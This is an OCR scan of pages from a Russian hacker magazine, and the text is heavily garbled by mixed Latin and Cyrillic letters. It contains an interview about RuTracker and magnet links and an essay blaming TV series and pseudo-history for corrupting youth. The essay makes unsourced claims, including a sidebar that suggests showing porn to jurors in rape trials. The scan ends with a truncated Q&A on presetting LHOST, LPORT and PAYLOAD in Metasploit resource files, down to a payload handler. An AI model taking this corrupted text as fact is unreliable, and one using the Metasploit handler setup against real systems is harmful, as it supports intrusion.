Снято* [2008-2010] 

* [Шін ст н] Дл—сай Ле ем в* 

(Диск огреби* 2 Дли бона) 
(2009-2000) 

гоМя о [ОмТготс, СгрегоопалЫ, 

О» Рооикоопро] 6*9* • Тиомтоетег 
(20X0) 

о [и*Р] (Агс-йесй) И 



Желе іо: комплектующие и периферия 

3 / * Ксомѵіахіиым і а обмии • Подбор • омфиттраиии. аыбор и «бсуодеиио ионлло*гт>сшнд • Сотмоо оборгДО**имо • 

« Обвтодриие пор«б«рин О Мобиле ном , пробе*** 

Кино, Видео и ТВ 

&) Предложения по улучшению категории *Кимо, Видео и ТВ" 

Кино, Видео и IV - помощь по реаделу 

• Робот* с ОѴС О Робот* с 6Ш ВАГ и Ю-ОѴО 

*и) • Кл*:. 



Лол* Роговая - ТОнноо них (2011 
* [ношаоачѵмоѵт ммы) ЛпДор - 



> - То. и лррноа (2010) 



РиТгаскег.огд — новое имя для Іоггепіз.ги 



Вывалили ситуации, аналогичные 
недавней приостановке делегиро- 
вания Іоггепіз.ги по «масштабности» и сте- 
пени произвола? Мы знаем, что вы всегда 
старались не афишировать такие вещи, 
так, быть может, это не первый случай? 

Нет. Виіхаскег.огд — это полностью публичный 
ресурс, и любая проблема моментально стано- 
вится достоянием общественности. Это знают 
все — и пользователи, и правообладатели. Поэ- 
томулюбые проблемы решаются максимально 
корректно, до скандалов дело доходит нечасто, 
если доходит вовсе. 

В конце зимы вы обещали суще- 
ственно модифицировать систему 
рейтинга на трекере, и вот совсем недавно 
ввели систему таймбонусов. Это был только 
первый шаг «модификации»? Если да, то 
как скоро нам ждать следующих и к чему 
готовиться? 

Дело в том, что с момента прихода битторрента 
в Россию, (а это где то 2002 -3 года] интернет 
существенно изменился. На смену «помега- 
байтным»тарифам, пришли безлимитные, 
существенно выросли скорости передачи 
данных, существенно расширилась география, 
количество подключений. Это сильно повлияло 
и на картину файлообмена в целом —теперь 
для поддержки ее «живучести» трафикуже не 
играет столь определяющей роли как раньше. 
На первое место выходит другие качества, одно 
из которых — это время жизни раздач. В идеале 
оно должно быть бесконечным: послетого как 
вы создали раздачу, она «расходится» по сети и 
живет дальше уже своей жизнью, независимо 
от вашей воли. Новые пользователи подклю- 
чаются, скачивают, раздаютуже следующим. И 
так до тех пор, пока существует интернет :). 
Однако в реальности дела обстоят существенно 



хуже: раздача «умирает», оттого что ее долгое 
время никто не скачивал и соответственно 
не поддерживал «на плаву». Количество 
такихторрентов просто огромно — на порядок 
больше чем удаляют правообладатели. Т.е 
несмотря на огромное количество пользова- 
телей с быстрыми каналами, с безлимитным 
интернетом, огромное количество информации 
в сети пропадает, из-за отсутствия источников 
информации. 

Именно эта проблема заставила нас ввести 
таймбонусы, мы хотим стимулировать пользо- 
вателей раздавать как можно больше времени, 
сохраняя информацию на своих компьютерах 
для будущих поколений пользователей (из- 
вините за пафос]. 

Вопрос в некотором роде продол- 
жающий прошлый — не плани- 
руете ли вы перейти на та^пеі-ссьшки, как 
поступила «Пиратская бухта»? Насколько 
удобной вообще вам видится эта система? 

Это вторая проблема современного файлооб- 
мена, (о первой я написал выше). Кроме «жи- 
вучести» информации, мы имеем дело с другой 
проблемой — ее достоверностью. 

Это означаетчто если вы скачиваете торрент 
который называется, например, «ленин_ 
был_грибом.аѵі»то вы должны быть уверены, 
что потратите время не зря и в результате 
посмотрите то что хотели, а не ночные, напри- 
мер, гонки стритрейсеров по Екатеринбургу. 
Существующая система оформления раздач 
на гиіхаскег.огд практически гарантирует это, 
поскольку раздачи многократно скачиваются, 
проверяются модераторами, и еслиторрентне 
соответствуют содержимому — он удаляется 
с форума, раздача — стрекера, и дальнейшее 
распространение тормозится. 

В случае с магнет-ссылками контрольза 
содержимым существенно усложняется: по- 



сколькутрекер кактаковой не нужен, любой 
может создать страничку, на которой выложит 
магнет-ссылки сзавлекательными названия- 
ми, и найдутся люди, которые будут качать (и, 
автоматически, распространять!) их с непред- 
сказуемым результатом. Такая проблема, кста- 
ти, естьу «пиратской бухты»: нежно любимые 
ею правообладатели нанимаютспециальные 
фирмы, которые засоряют их сайт фальшивыми 
ссылками. 

Конечно, можно проверять валидность и 
магнет-ссылок, но у трекера есть еще одно 
большое преимущество — это скорость обмена 
пирами. Это означает, что трекер вам выдает 
нужные адреса сразу после запроса и юзер 
качает раздачутак быстро, какэто возможно. 

В случае с магнет-ссылками процесс нахожде- 
ния нужных пиров может затянуться надолго, а 
результат никто не гарантирует. 

С другой стороны у магнетов есть и очевидные 
преимущества. В первую очередь — это абузоу- 
стойчивость. Врядли кто из правообладателей 
осилит борьбу с кусками текста в сети (тадпеі:- 
Ііпк — это, по сути, строчка текста, которую даже 
не надо маскировать как ссылку], а значит, 
переход на магнет-ссылки будет серьезным 
шагом на пути к«свободе информации» о кото- 
рой некоторыетак мечтают. 

Каким мы видите будущее файлоо- 
обмена в России, особенно в свете 
последних инцидентов? 

Будущее файлообмена в России примерно 
такоеже, как и во всем остальном мире (с 
учетом нашей местной специфики — история с 
доменом Іоггепіз.ги тому пример). 

Во-первых, будет продолжаться пропаганда 
незаконности файлообмена, несмотря нато, 
что его запрещение кактакового — это прямое 
нарушение Конституции любой уважающей 
себя страны, фактически введение цензуры. 
Тем не менее, легализации законов в этой об- 
ласти в скором времени ожидать не приходится 
- «охота на качал ыщиков» выгодна почти всем: 
государству, правообладателям, силовым 
структурам, и, конечноже, организациям по 
защите авторских прав. «Хватай любого, сажай 
за решетку» — таксейчас работаетзакон в этой 
области, чем ситуация поразительно напоми- 
нает средневековую охоту на ведьм. 

Во-вторых, производители контента будут 
учиться вести бизнес с поправкой на файлооб- 
мен, а может, даже изначально ориентируясь на 
него. Более того, многиеуже экспериментируют 
в этой области. Например, сегодня я слушал 
альбом довольно известной в узких кругах 
группы, где в начале каждой песни была ко- 
ротенькая реклама ихспонсора, выполненная 
в общей концепции произведения. Альбом 
естественно распространялся свободно. 

На вопросы отвечал Александр Волков, 
юрист компании Огеагтйоггеп* Согр. 
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ІЛЧІТ5 



Оксана «Огіуапа» Андреева огіуапаШхрзусНо.ги 




РЗѴСНО: 

ЧЕРНОЕ ИСКУССТВО РАСТЛЕНИЯ ДУШ 

Современная масс-медиа реальность и ее влияние 
на формирование мировоззрения 

С детства в нас закладывают шаблоны, которые во взрослой жизни 
мы используем по умолчанию. Управляя этими дефолтными на- 
стройками, манипуляторы с легкостью заставляют нас совершать 
нужные им действия. Причем действуютони целенаправленно, и 
самый мощный удар приходится на неокрепшие умы детей и под- 
ростков. 



Д авно известна истина, что легче 
воспитать в нужном русле щенка 
с рождения, чем переучивать 
взрослую собаку. То же касает- 
ся и людей. Вот почему возраст 
обучения в детских садах и школах строго 
регламентирован. 

В вузахтоже есть свои возрастные приори- 
теты — чем моложе студент, тем лучше. 

Такие правила существуют не зря. Согласно 
возрастной психологии, каждый возраст 
является сензитивным (восприимчивым] для 
закладывания основ личности и развития 
определенного вида восприятия: чуткость, 
эмоциональность, нахождение образов 
извне и интериоризация (их перенесение с 
интеграцией внутрь]. Шаблоны, заложенные 
в раннем возрасте, управляют человеком на 
протяжении всей его жизни. Эти шаблоны 
являются сутью нашего мировоззрения, кото- 
рое выстраивается... нет-нет, не подумай, что 
нами. «Кем? » — спросишь ты. Вот об этом мы 
сейчас и поговорим. 

Мировоззрение : 
что это такое? 

Мировоззрение — это взгляд на мир в целом, 
система представлений и убеждений о себе, 
о мире вокруг, об отношениях, процессах, за- 
кономерностях бытия; это наши ценностные 



ориентации; это все наши знания, переплетен- 
ные в одно целое, но не всегда согласованные 
логически. 

Мировоззрение может складываться из на- 
шего личного опыта, опыта наших родителей, 
элементов культуры и менталитета или просто 
необоснованныхустановок извне. Зачастую 
эти установки конфликту ют друг с другом или с 
опытом, что чревато неврозами. Возьмем два 
постулата: «пьянство — это плохо» и «старших 
нужно уважать и братье них пример». И сразу 
находим типичный образец: вечно пьяный 
60-летний сосед Вася, который постоянно 
путаеттвою дверь с входом в туалет. Нелегкий 
выбор позиции, правда? 

Или другой шаблон, который крепко сидит в 
сознании с детства: «Старый друг лучше новых 
двух». Сразу вспоминается, с каким раздраже- 
нием мы заставляем себя «взять по пиву» со 
старым другом Ромой и два часа придумываем, 
что бы такое сказать — ведь общихтем для 
разговора уже не осталось. Утешением служит 
только мысль: «Ведь дружили когда-то»... 

Но радостнее от нее не становится. Однако 
при этом мы обесцениваем новыхлюдей, 
которые приходят в нашу жизнь, разделяют с 
нами интересы, увлечения, и, в конце концов, 
просто являются носителями новыхзнаний 
и опыта, который может очень пригодиться. 
Наиболее активно мировоззрение формирует- 



ся в детском и подростковом возрасте, когда 
ребенокочень чувствительно (но недостаточно 
осмысленно] воспринимаетлюбую информа- 
цию извне. 

На стыке поколений 

Какие факторы влияют на формирование 
личности и ее мировоззрение в последние 
десятилетия? 

С одной стороны — это привычные авто- 
ритеты: родители, учителя с правилами и 
нормами, которым их в свое время научили 
наставники. Кто-то эти догмы принимает и 
живет сними всю жизнь. А кого-то они напря- 
гают, так как идут вразрез с современными 
настроениями. 

И тут появляется другая сторона — новые 
авторитеты. Их олицетворяют реклама, СМИ, 
интернет. Они соблазняют новыми идеалами: 
свободой, удовольствием, экстримом. 

Таким образом, одна сторона отталкивает, 
вторая — привлекает. Подумай сам: что вы- 
берет среднестатистический современный 
подросток из вариантов «Секс только после 
свадьбы» и «Живи на полную, не ограничивай 
себя ни в чем!»? 

Новые ценности, внедряемые в наше мировоз- 
зрение, затрудняют создание полноценных се- 
мей, воспитание детей, поддержание крепких 
дружеских отношений. 
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Психологическая подо- 
плека деморализации 
новых поколений 

В подростковом возрасте (1 1-16 лет] социали- 
зация (внедрение в общество, познание его 
законов] происходит наиболее интенсивно. Ре- 
бенок, как губка, впитывает в себя колоссаль- 
ное количество очень разнообразной и иногда 
противоречивой информации. Она поступает 
от различных социальных агентов: родители, 
школа, друзья, интернет, СМИ, реклама. И 
чтобы не потеряться в этом потоке, нужен про- 
водник, который поможет сориентироваться и 
систематизировать получаемую информацию. 
Для одного таким советчиком становится мать, 
для второго — старший друг, для третьего — Ар- 
темий Лебедев, для четвертого — Эрик Картман 
из Южного Парка. И, как всегда, действует 
принцип: чем ярче и авторитетнее образ, тем 
большее влияние он оказывает на формирова- 
ние мировоззрения. 

Именно социальные агенты новых авторитетов 
служаттому, что мы называем «черным ис- 
кусством растления душ». Причем на экранах 
телевизоров, страницахжурналов и билбордах 
мы редко увидим прямой призыв камораль- 
ным поступкам и решениям. Внушение идет 
непрямым, завуалированным способом. Об- 
рати внимание — образы, прототипы, которые 
сейчас являются кумирами детей, подростков, 



а зачастую и взрослых людей, обладают при- 
влекательными чертами. Такими, например, 
как гениальный ум, отличное чувство юмора, 
находчивость, нестандартное мышление, 
внешняя привлекательность, сексуальность. И 
в связке с ними демонстрируются качества, не- 
гативно влияющие на формирование личности: 
страсть к наркотикам, отчуждение, отсутствие 
каких-либо моральных принципов, язвитель- 
ность, цинизм, агрессия. 

Здесь есть несколько опасных моментов. Пер- 
вый: поскольку наша психика воспринимает 
образ в целом, а не отдельные его черты, то и 
хорошее, и плохое усваивается без анализа, 
автоматически. Второй: при воспроизведении 
образа в своем поведении, интеграции его в 
свою личность, довольно тяжело развить в себе 
интеллектуальные способности, как, напри- 
мер, у доктора Хауса. Намного проще стать 
циником и подсесть на викодин. Из двух путей 
выбираем, естественно, более легкий. В этом и 
состоитловушка. 

Еще один способ деморализации — подмена 
привычных нам образов новыми. В качестве 
примера вспомним сказку «Золушка». Милая, 
добрая, романтичная девушка, суетливо 
спешащая домой без пятнадцати двенадцать... 
И сразу перед глазами всплывает реклама 
какого-то оператора мобильной связи: фея 
звонит на сотовый современной пьяно- 



обкуренной Золушке, скачущей на дискотеке, 
чтобы сказать, что время заканчивается. И в 
ответ получает«Иди на ..., фея!». Суть ролика, 
конечно, была втом, что оператор не ограни- 
чивает время общения 12 часами. Нов памяти 
осталось не название компании, а именно угар- 
ная Золушка. Новый будоражащий сознание 
образ не остался незамеченным подростками, 
и многие родители вскоре были посланы туда 
же, куда и фея. 

Пути внедрения «нового» 
стиля жизни 

Для «коррекции» нашего менталитета мани- 
пуляторы используют различные средства: это 
и телевидение, и учебники для школьников и 
студентов, и декларация модных веяний. 

Раз уж за шла речь о конкретных примерах, 
предлагаю пробежаться по особо популярным 
сериалам и фильмам, чтобы отследить, каким 
образом они влияют на формирование нашей 
личности и мировоззрения. 

Доктор Хаус 

Это кумир. На сегодняшний день«Ноизе 
МЮ.» — самый популярный сериал среди всех 
существующих. Только «ВКонтакте» группы его 
фанатов насчитываютсотни тысяч человек. 

Ему поклоняются, наследуютего образ, он вы- 
зывает восхищение и парней, и девушек, и их 
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Новое поколение — новые 
ценности 




то в бегах; то в роскоши, то в бедности] сериал 
привлекает внимание и очаровывает. Это одно 
из свойств восприятия — соединение противо- 
положностей в одном целом понимается как 
признак харизматичности. Объект восхищения 
мы воспринимаем не критично, а чувственно; 
это значит, что информационный слоеный 
пирог, щедро сдобренный эмоциональным 
кремом, пипл схавает, особо не вдумываясь. 
Второе: посмотрим на информационные 
слои «пирога». Позитивное подкрепление — 
крепкая дружба, крутизна и влиятельность, 
бесстрашие, романтичность. Атеперь беглый 



Именно новые авторитеты - социальные агенты - 
служат тому, что мы называем «черным искусством 
растления душ». Причем с экранов телевизоров, со 
страниц журналов и бигбордов мы редко увидим пря- 
мой призыв к аморальным поступкам и решениям. 
Внушение идет непрямым, немного завуалированным 
способом. 



родителей. Благодаря Хаусу весь мир знает о 
волчанке, викодине и отом, что все врут... 
Давай рассмотрим этот персонаж подробнее. 
Холостой мужчина приблизительно 40 лет, 
гениальный врач-диагностс нестандартным 
складом ума и блестящим чувством юмора. Это 
черты, которые даны не каждому. А вотто, что 
может воспроизвести (и нередко воспроиз- 
водит] любой: калека — многие абсолютно 
здоровые фанаты уже ходят с тростью; 
наркоман — форумы утопают в темах «Где 
достать викодин?»; циник, мизантроп, атеист, 
«тролль», лжец. Нарушает все возможные 
правила, сторонится близкого общения. Един- 
ственный друг — Уилсон — терпитего приколы 
только из-за своей природной лояльности и 
нерешительности. Грубит пациентам, подкалы- 
вает начальницу, при этом боится признаться 
ей в чувствах, занимается сексом только с про- 
ститутками. Но разве все это имеетзначение? 
Ведь он «просто лапочка»! Теперь представь 
этотже образ, только без развитого интеллек- 
та, гениальности и хорошего чувства юмора. 
Любой из нас рискует стать та кой пародией 
на «лапочку», если вовремя не задумается о 
слепом копировании. 

Правосудие Декстера 

Еще один «милашка». Симпатичен, обаятелен, 
умен, находчив, изобретателен. У него есть 
любимая женщина, двое приемных детей и 
один родной ребенок, которых он безумно лю- 



бит, он ладитпочти со всеми коллегами... А по 
ночам убиваетлюдей и расчленяетихтела. Его 
тянетккрови, убийствам, и он не можетничего 
особой поделать. Поэтому приходится вести 
двойную жизнь. В целом, согласись, довольно 
позитивный образ. И ничего страшного втом, 
что он жестокий убийца, ведь он вершит право- 
судие над злы ми маньяками и помогает при 
этом обычным людям. Но это говорит нам наше 
сознание. А подсознаниетем временем привы- 
кает ктому, что кровь, убийства, расчлененка 
— это нормально, знакомо глазам и разуму. Тем 
более, если можно бытьхорошим человеком 
и убийцей одновременно. Мужчины с детства 
склонны быстро привыкать кжестокости, и по- 
добные кадры очень помогаютим в этом... (см. 
врезку «Эксперименты над присяжными»]. 

И самое главное — в сериале показан такой 
хороший способзаметания следов! Соблазн 
попробовать растет... 

Бригада 

Красивая и жизненная история о судьбах 
четырех друзей, сказание о любви и ненависти, 
дружбе и предательстве, смелости и трусости, 
о взлетах и падениях, о рождении и смерти. Это 
первый сериал, который поразил нас реалис- 
тичностью происходящего — все каквжизни... 
Атеперь — стоп. Давай поиграем в психоана- 
лиз. Первое: именно реалистичными деталями 
(удары, похожие на настоящие, матерные вы- 
ражения] и игрой контрастов (герои то в почете, 



взгляд на то, что идет в связке: крутизна, бо- 
гатство и влиятельность достались с помощью 
торговли наркотиками и оружием, убийством 
неугодных; крепкая дружба доказывалась 
руками по локоть в крови; бесстрашие граничит 
с безбашенностью, пренебрегающей природ- 
ным инстинктом самосохранения; романтика 
в сериале была в основном в первых сериях, 
когда Белый заслушивался игрой на скрипке. 
Хотя... визиткврачус ребенком вто время, как 
возле больницы вот-вот начнется перестрелка 
— чем не романтика? Кстати, обрати внимание 
на еще один момент. В одной из первых серий 
показан эпизод, где Белый бьется с Мухой. Бой 
длится достаточно долго, хотя, если есть опыт, 
ты знаешь — несколькими ударами такой силы 
человек вырубается практически сразу. Но мы 
смотрим эту сцену 5-7 минут, удары обруши- 
ваются один за другим, а участники поединка 
все еще целы и бодры духом. И возникает ощу- 
щение, что можно драться бесконечно долго, 
и максимальными последствиями будут не- 
сколько синяков и разбитый нос. Притупляется 
чувство опасности, и в реальной жизненной 
ситуации это может стать фатальным. 

Исход сериала мы все хорошо помним. Но в 
гибели героев тоже есть небольшой секрет. С 
одной стороны, понимаешь, что к насильствен- 
ной смерти привел именно беспорядочный и 
рискованный образжизни. С другой стороны, 
смерть была чуть ли не геройской, следова- 
тельно, появляется ощущение: то, за что они 



► 134 
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Он настоящий. Аты — нет 




Гламурные головорезы смогли 
влюбить в себя все постсоветское 
пространство 




Ощутивтакую свободу, на 
меньшее ты уже несогласен. 
Адальше — куда? 



погибли — это подвиги. Тогда многие под- 
ростки под влиянием юношеского максима- 
лизма торжественно клялись продолжать дел о 
Пчелы, Фила и Космоса. 

А вот несколько ярких комментариев фанатов 
сериала на одном киносайте: 

«...Я оченьочень-оченьсильнообожаю и 
люблю сериал Бригада, он оченьсуперский... 
жизненный и поучительный... Он учит смыслом 
тому, что надо именно вот та к вот дружить, как в 
этом фильме, друг за друга... и если что, то у них 
руки у всех в крови... они показали себя, как 
надо быть вместе до конца и за друг друга могут 
горы свернуть...». 

«...Правильны слова отом, что восхищаться 
можнотолько игрой актеров, таккаксами пер- 
сонажи этого фильма отморозки и бандюки, 
но извините, сердцу не прикажешь, сама пони- 
маю, что это неправильно, но что поделать? Я 
люблю бандитов, по моему мнению, они очень 
сексуальны...» 

Теперь понятно, в чем еще один секрет? В 
сексуальности и профессионализме актеров. 

И действительно, все четверо — гламурные 
красавчики в черных пальто, начищенных 
туфлях, с пистолетами, при деньгах, с четкой 
мимикой и жестикуляцией, сживыми эмоция- 
ми. Образец подражания для мальчиков, пред- 
мет восхищения для девочек. Такна сверх- 
сознательном уровне появляется установка, 
что «бабки, тачки и телки» есть у тех, кто может 
ограбить, убить, отобрать силой и с помощью 
оружия. Все быстро, весело и с адреналином. 
Удевочектоже возникает дилемма: серый и 
однообразный офисный менеджер или яркий 
парень, способный натакие рискованные и 
романтичные поступки, да еще с деньгами. Од- 
нако, как показывает практика, романтичность 

— это всего лишьложка меда в бочке дегтя. 

Дом 2 

Его тоже нельзя обойти вниманием, таккак 
аудитория очень многочисленна, и большин- 
ство зрителей — это дети и подростки. Кто-то 
получаетза счет проекта знаменитость, кто-то 

— прибыль, а кто-то — деструктивные шаблоны 
отношений мужчин иженщин. И последних, к 
сожалению, несравнимо больше. 
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И мен но та к в последнее десятилетие формируется мировоззрение 
ребенка 





Фолк-хистори 

Еще один способ более высокого уровня влия- 
ния на массовое сознание и даже менталитет. 
Он очень часто используется в политических 
целях: сепарация групп людей (для уменьше- 
ния их сопротивляемости] или их объединение 
(длятого, чтобы легче, без военных действий, 
получить власть над большим количеством 
этих самых людей]. Это псевдоистория или 
фолк-хистори. 

Работы, написанные в научном стиле, однако 
не являющиеся подлинно научными. Такие 
труды создаются с конкретной целью — запу- 
тать, исказить исторические факты, изменить 
видение произошедшего, выставляя все 
в ином свете. Делается это чаще всего для 
защиты действующей власти или обвинения 
свергнутой системы правления. Например, 
фашистская оккупация выглядит не какагрес- 



сивный захват мирных территорий, а как отпор 
и укрощение повстанцев. 

Происходитсмена восприятия событий с по- 
мощью конкретных приемов: 

• через подмену понятий, например: «мирное 
население» — «бунтари»; 

• через «подкидывание» вновьоткрывшихся 
фактов, которые появились неизвестно откуда, 
например: «...Из рукописей, части ч но уцелев- 



Купающийся в викодине 
«больной ублюдок» (дословный 
перевод). Не правда ли, хороший 
пример для подражания? 

ших в сгоревшей библиотеке хутора Мамаевка 
Ставропольского края, исследователи струдом 
расшифровали надписи, которые говорят нам 
о новых фактах... (ну и далее по тексту]»; 

• и особенно — через двоякое толкование 
одного итого же события, например: турецкий 
геноцид армян и их принудительная эвакуация 
вусловиях военных действий. Факт один итот 
же, но насколько меняется к нему отношение, 
если дать разные названия! Та же история с 
Саласспилским лагерем в Латвии, который 
однажды вдруг стал «воспитательно-трудовым 
учреждением закрытого типа». От «трудового 
воспитан ия» тысяча ми умирали люди, в том 
числе — дети. 

История — неточная наука, строящаяся в 
основном на субъективныхтолкованиях и 
воспоминаниях очевидцев. Но, какты пони- 
маешь, показания агрессора и жертвы всегда 
будут разными. Даже историки и архивариусы 
говорятотом, что одно ито же событие опи- 
сывается в разных источниках по-разному. И 
это очень играет на рукутем, кто у руля. При 
советской власти учебники называли воинов 
Украинской повстанческой армии голово- 
резами, властьсменилась — и они стали 
национальными героями. Что же происходило 
на самом деле? Есть объективный факт: они 
нападали на людей и убивали их. И вот здесь 
самое интересное: приписав им определенную 
мотивацию, мы делаем их либожестокими 
убийцами, либо защитниками своей родины. 
Через 20 лет, если придет другая власть, при- 
нудительно сменится и подоплека историчес- 
ких фактов. 

И все это печатается в школьныхучебниках 
истории. Большинство детей и подростков 
принимают все на верутолько потому, что 
информация идет из официального источника, 
утвержденного Министерством образования. 

И вряд ли школьники идут в архивы перепро- 
верять исторические «факты», поданные в 
книгах. Теперь понимаешь, почему учебники 
так часто переиздаются? 

Такчто будьуверен, что любое историческое 
преступление против своего народа спустя 
пару десятилетий может превратиться в 
героический подвиг. Или наоборот. И чем 



ЭКСПЕРИМЕНТЫ НАД ПРИСЯЖНЫМИ 



Как показывает практика, мужчинам свойственно более быстрое привыкание к жестокости 
по сравнению с женщинами. Но при этом сексуальные насильники имеют шанс получить 
более легкое наказание, чем следовало бы. К такому выводу пришли ученые в результате 
ряда экспериментов. Оказывается, если перед заседанием или во время него часто пока- 
зывать присяжным (мужчинам] фрагменты порно или сцены сексуального характера (а это 
можно сделать неотъемлемой частью судебного процесса по делам об изнасилованиях, 
остается только придумать, как их эффектно подать), то приговор будет мягче. 



► 136 
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НТО ТАКОЕ «ВИКОДИН» НА САМОМ ДЕЛЕ? 



Викодин — наркотическое обезболивающее средство, содержащее гидрокодон и параце- 
тамол. Длительный прием в больших дозах может вызвать слабую эйфорию, а в дальней- 
шем — болезненное пристрастие. Возможны побочные эффекты: аллергические реакции, 
припадки, липкая кожа, гипервентиляция, потеря сознания, пожелтение глаз или кожи, 
кровотечения, гематомы, констипация, сухость во рту, тошнота, рвота, пониженный аппе- 
тит, мышечные судороги, потоотделение, приливы, зуд, звон в ушах, полная потеря слуха, 
затрудненное мочеиспускание и снижение сексуального влечения. 



больше времени прошло с момента события, 
тем меньше шансов узнать, что же произошло 
на самом деле... 

Кто, зачем и для чего? 

Вот мы и подошли к основному вопросу: кому и 
для чего это нужно? Чтобы понять, для чего, да- 
вай подведем итоги — какие качества, образы, 



действующему руководству компании. Счаст- 
ливым и психологически целостным человеком 
практически невозможноуправлять. Поэтому 
манипуляторы ставят жертву перед тяжелым 
выбором, в результате которого они получают 
то, что хотят, а человек остается в разбитом 
душевном состоянии. 

Погоня за кайфом, удовольствием, экстримом 



рекламодателей претендуют на эфирное время 

— тем оно дороже. Чем дороже рекламное место 

— тем выше прибыль канала (газеты, сайта], что 
неминуемо грозитповышением зарплат сотруд- 
ников, и в частности, администрации. 

И еще один момент, о котором не стоит за бывать 

— это спонсоры и идеи, которые он и диктуют. 
Именно эти невидимые серые кардиналы пыта- 
ются с помощью масс-медиа превратить людей 
в марионеток, чтобы потом управлять ими, 
используя в качестве рычаговтелевидение, 
прессуй интернет. 

Как не поддаться 
соблазну? 

Наше детство уже далеко позади. Но это не 
гарантия того, что мы не подвержены влиянию, 
идущему с мониторов и экрановтелевизоров. 
Мы — взрослые, и у настоже есть интересы. 
Масс-медиа охотно удовлетворяет их, диктуя 



При советской власти учебники называли воинов 
Украинской повстанческой армии головорезами, 
власть сменилась - и они стали национальными 
героями. 



приоритеты декларируются и скрыто пропаган- 
дируются? Жестокость, наркомания, дости- 
жение своих целей обманом, силой, оружием, 
слишком открытая демонстрация сексуальных 
отношений, провокация на «слабо», кричащая 
эпатажность, агрессия, хождение по головам, 
продажа себя, своих принципов ради денег или 
славы, создание идолов... 

Теперь можно подробнее разобрать последст- 
вия изменений в общественном настрое. 
Жестокость, агрессия, высмеивание близких, 
доверительных, теплых отношений — все это 
приводит к сепарации, дистанцированию 
людей друг от друга. Вспоминаем принцип 
управления «Разделяй и властвуй». 

Желание быть в центре внимания, престиж, 
положение в обществе, материальное благо- 
состояние — это те стимулы, которые застав- 
ляют многих людей идти на жертвы. Вспомни 
фильм «20 сигарет»: перед главным героем 
стоит выбор — предать друга и получить хоро- 
шую должность или сохранить дружбу и быть 
уволенным. С учетом того, что вот-вот должна 
родить жена, и ей с ребенком потребуется 
забота, втом числе и материальная, выбор 
очень нелегкий. И какой бы выбор он не сделал, 
у него все равно останется чувство вины. В 
принципе, можно было и дружбу сохранить, и 
семью обеспечить. Но представим дальнейшее 
развитие событий: счастливый главный герой 
продолжает работать в компании, получая 
новый опыт, растетв профессиональном плане. 
У него хороший друг, замечательная семья. 

Рано или поздно он достигнет потолка, и ему 
захочется большего. Вполне вероятно, что он 
откроетсвой бизнес и составит конкуренцию 



— это как наркотик. Ты к нему привыкаешь, 
и через некоторое время уже хочется чего- 
нибудь сильнее вставляющего. Чем дальше, 
тем больше. Прежние развлечения уже не при- 
носят кайфа, приходится искать что-то более 
изощренное, эксклюзивное... и дорогое. После 
дворовых качелей американские горки — это 
просто бомба! Но после прыжка с парашютом 
в свободном падении с высоты 4000 метров 
веселые горки кажутся детским садом... И вся 
жизнь превращается в гонку за чем-то новым. В 
мечтах об очередной «новинке» или полете на 
катапульте многие из нас забывают, что гормо- 
ны счастья — эндорфины — можно получить не 
только в погонеза экстримом, но и с помощью 
обычных человеческих радостей. 

Как видишь, практически все способы влияния 
направлены на то, чтобы свести к минимуму то 
человечное, что в нас есть: нашудушу, нашу 
мораль, нашу совесть. А что есть человек без 
души? Робот, зомби, марионетка... Неважно, 
как мы это назовем, важна суть. А в чем суть — 
ты понимаешь и сам. 

Вопрос второй: кому и зачем все это нужно? 
Логику проследить несложно: подкармливая 
среднестатистического обывателя сенсациями, 
новыми привлекательными образами, вовлекая 
его в авантюры, расследования, обещая новые 
крышесрывающие ощущения, различные 
печатные и интернет-издания, ТВ-шоу и сайты 
таким образом располагают ксебе читателей 
и зрителей. Основная суть втом, что все это 
вызываетзависимость. И чем более широкую 
аудиторию удается зомбировать — тем выше 
рейтинг. Чем выше рейтинг — тем больше при- 
влекательность для рекламодателя. Чем больше 



при этом свои правила. Как противостоять 
информации, влияющей на наше бессознатель- 
ное? 

1 . Анализируй. Когда ты видишь на экране 
нового героя, который нравится практически 
всем, задумайся — за счет каких качеств он 
привлекаетлюдей? В чем его эффективность, 
в чем деструкция? Если очень хочется на- 
следовать доктора Хауса, проанализируй: что 
именно тебя привлекает (или чего не хватает): 
привязанность кнаркотикам, мизантропия 
или все-таки высокий интеллект и умение им 
пользоваться? 

2. Чувствуй. Если с монитора маленький чер- 
ный человечектипа мистера Фримена саркас- 
тичным голосом подводиттебя к мысли, что ты 
живешь не так — почувствуй себя. Чего именно 
ты хочешь? Действительно выброситьсвой 
винчестер и подарить мобильный телефон? 

Или ты просто боишься ударить лицом в грязь, 
не ответив на вызов «Атебе слабо...?». Ведь это 
банальная форма манипуляции. С помощью 
псевдологических конструкций можно вбить в 
голову что угодно. Незабывай об этом. Ателе- 
фон и винчестер оставь себе — они пригодятся 
больше, чем доказывание неизвестно кому, что 
ты нетряпка. 

3. Оставайся человеком, который сам выби- 
рает свои желания и создает свои планы на бу- 
дущее. Будьуверен в своих действиях и своих 
решениях. Акцент на слове «своих». И тогда у 
манипуляторов будет гораздо меньше шансов 
тобой управлять. 

4. Читай журнал «Хакер». Как показали ис- 
следования, люди с ІТ’шным складом ума реже 
поддаются манипуляциям :І ЛГ 
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0: Подскажи, как можно автоматизировать 
такую рутинную работу какустановка І_Н05Т, 
1_Р0ПТ, РАУЬОАй и других параметров в 
Меіазріоіі Ргатеѵѵогк, чтобы не приходилось 
каждый раз заново вводить их руками. 

А: Действительно, каждый раз вручную зада- 
вать одни и те же параметры не совсем удобно. 
Ксчастью, в Меіазріоіі Ргатеѵѵогк есть воз- 
можность для автоматизации — это файлы ре- 
сурсов. На самом деле файлы ресурсов пред- 
ставляют собой обычные скрипты, в которых 
прописывается все необходимое. С недавнего 
времени в файлы ресурсов можно вставлять 
целые блоки кода на Рыбу. Если создать скрипт 
с именем тзіюопзоіе.гс и положить его в 
директорию -ЛтзЕЗ/тзіюопзоІе. гс, то он будет 
автоматически загружаться каждый раз при 
запуске тзіюопзоіе. Это идеальный способ ав- 
томатической установки основных параметров 
(ехріоіі, РАУЮАЭ, ИРОНТ, ЕН05Т и т.д.]. Для 
того, чтобы понять, как создать файл ресурсов, 
советую тебе разобрать демонстрационный 
пример — боситеп1;а1;іоп/пп5І : соп5о[е_гс_гиЬу_ 
ехатріе.гс 

Если запустить его с помощью команды $ ./ 
тзіюопзоіе -г боситеп1;а1:іоп/пп5І : соп5о[е_гс_ 



гибу_ехатрІе.гс, то он автоматически устано- 
вит все параметры и запустит эксплойт. 

гезоигсе (сІоситепСаЦіоп/ 
тз 1сопзо1е_гс_гиЬу_ехатр1е . гс ) > 
изе ехрІоіС/тиІСі/ЬапсІІег 
гезоигсе (сІоситепРаСіоп/ 
